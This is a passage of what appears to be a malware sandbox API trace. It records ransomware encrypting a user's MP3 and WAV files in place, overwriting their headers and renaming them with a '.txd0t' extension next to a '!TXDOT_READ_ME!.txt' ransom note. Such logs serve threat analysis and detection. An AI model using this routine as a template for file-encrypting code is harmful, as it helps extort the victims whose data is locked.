psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3" [0075.034] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3") returned="3MXWb597R4.mp3" [0075.034] StrCpyW (in: psz1=0xe9b6c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.034] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned 1 [0075.034] GetProcessHeap () returned 0xe30000 [0075.034] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0075.034] CloseHandle (hObject=0x460) returned 1 [0075.037] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\3mxwb597r4.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\3MXWb597R4.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\3mxwb597r4.mp3.txd0t")) returned 1 [0075.037] SetEvent (hEvent=0x3f8) returned 1 [0075.037] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.038] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav" [0075.038] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t" [0075.038] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t") returned 0 [0075.038] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav", dwFileAttributes=0x80) returned 1 [0075.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\bhthzsyefd5ggeidkz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.039] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=90132) returned 1 [0075.039] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.039] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.040] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe9dec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.040] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x16010, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x16010, lpOverlapped=0x0) returned 1 [0075.042] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe9ff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.042] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x16010, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x16010, lpOverlapped=0x0) returned 1 [0075.042] FlushFileBuffers (hFile=0x460) returned 1 [0075.044] GetProcessHeap () returned 0xe30000 [0075.044] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14c) returned 0xeca148 [0075.044] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav" [0075.044] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav") returned="BhtHzSyEfD5ggEidkz.wav" [0075.044] StrCpyW (in: psz1=0xeca1c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.044] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned 1 [0075.045] GetProcessHeap () returned 0xe30000 [0075.045] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.045] CloseHandle (hObject=0x460) returned 1 [0075.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\bhthzsyefd5ggeidkz.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\BhtHzSyEfD5ggEidkz.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\bhthzsyefd5ggeidkz.wav.txd0t")) returned 1 [0075.047] SetEvent (hEvent=0x3f8) returned 1 [0075.047] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.048] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3" [0075.049] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t" [0075.049] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t") returned 0 [0075.049] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3", dwFileAttributes=0x80) returned 1 [0075.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\fjikxupkzhaatw7bvg2.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.049] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=88437) returned 1 [0075.049] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.049] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.050] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffea48b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.050] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x15970, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x15970, lpOverlapped=0x0) returned 1 [0075.052] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffea690, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.052] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x15970, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x15970, lpOverlapped=0x0) returned 1 [0075.052] FlushFileBuffers (hFile=0x460) returned 1 [0075.058] GetProcessHeap () returned 0xe30000 [0075.058] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14e) returned 0xeca148 [0075.058] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3" [0075.058] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3") returned="fJIkxuPkzHAaTw7Bvg2.mp3" [0075.058] StrCpyW (in: psz1=0xeca1c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.059] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned 1 [0075.059] GetProcessHeap () returned 0xe30000 [0075.059] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.059] CloseHandle (hObject=0x460) returned 1 [0075.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\fjikxupkzhaatw7bvg2.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\fJIkxuPkzHAaTw7Bvg2.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\fjikxupkzhaatw7bvg2.mp3.txd0t")) returned 1 [0075.061] SetEvent (hEvent=0x3f8) returned 1 [0075.062] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.067] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3" [0075.067] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t" [0075.067] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t") returned 0 [0075.067] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3", dwFileAttributes=0x80) returned 1 [0075.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\lweeze6njkctwugef3c.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0075.067] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=24669) returned 1 [0075.067] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.067] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.068] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff9da3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.068] ReadFile (in: hFile=0x46c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x6050, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x6050, lpOverlapped=0x0) returned 1 [0075.069] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff9fb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.069] WriteFile (in: hFile=0x46c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x6050, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x6050, lpOverlapped=0x0) returned 1 [0075.069] FlushFileBuffers (hFile=0x46c) returned 1 [0075.078] GetProcessHeap () returned 0xe30000 [0075.078] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14e) returned 0xeca148 [0075.078] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3" [0075.078] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3") returned="lwEeZe6NJKctwuGef3c.mp3" [0075.078] StrCpyW (in: psz1=0xeca1c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.078] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned 1 [0075.078] GetProcessHeap () returned 0xe30000 [0075.078] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.078] CloseHandle (hObject=0x46c) returned 1 [0075.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\lweeze6njkctwugef3c.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\lweeze6njkctwugef3c.mp3.txd0t")) returned 1 [0075.080] SetEvent (hEvent=0x3f8) returned 1 [0075.080] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.085] StrCpyW (in: psz1=0x37ff440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3" [0075.085] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t" [0075.085] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t") returned 0 [0075.085] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3", dwFileAttributes=0x80) returned 1 [0075.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\rwrypfofe9_zr8omah.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.086] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=19171) returned 1 [0075.086] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.086] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.087] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb31d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.087] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x4ae0, lpNumberOfBytesRead=0x37ff400, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff400*=0x4ae0, lpOverlapped=0x0) returned 1 [0075.087] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb520, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.087] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x37ff404, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff404*=0x4ae0, lpOverlapped=0x0) returned 1 [0075.088] FlushFileBuffers (hFile=0x460) returned 1 [0075.094] GetProcessHeap () returned 0xe30000 [0075.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14c) returned 0xeca148 [0075.094] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3" [0075.094] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3") returned="rWrYpfOfe9_Zr8omah.mp3" [0075.094] StrCpyW (in: psz1=0xeca1c0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.094] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\!TXDOT_READ_ME!.txt") returned 1 [0075.094] GetProcessHeap () returned 0xe30000 [0075.094] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0075.094] CloseHandle (hObject=0x460) returned 1 [0075.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\rwrypfofe9_zr8omah.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\vdr6kombj3v3xp\\rwrypfofe9_zr8omah.mp3.txd0t")) returned 1 [0075.096] SetEvent (hEvent=0x3f8) returned 1 [0075.096] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.100] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav" [0075.100] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t" [0075.100] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t") returned 0 [0075.101] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav", dwFileAttributes=0x80) returned 1 [0075.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav" (normalized: "c:\\users\\fd1hvy\\music\\ruurogrx9gfxruyvye\\w-ootvbhe3qmz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0075.102] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=4597) returned 1 [0075.102] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.102] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.103] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffec0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 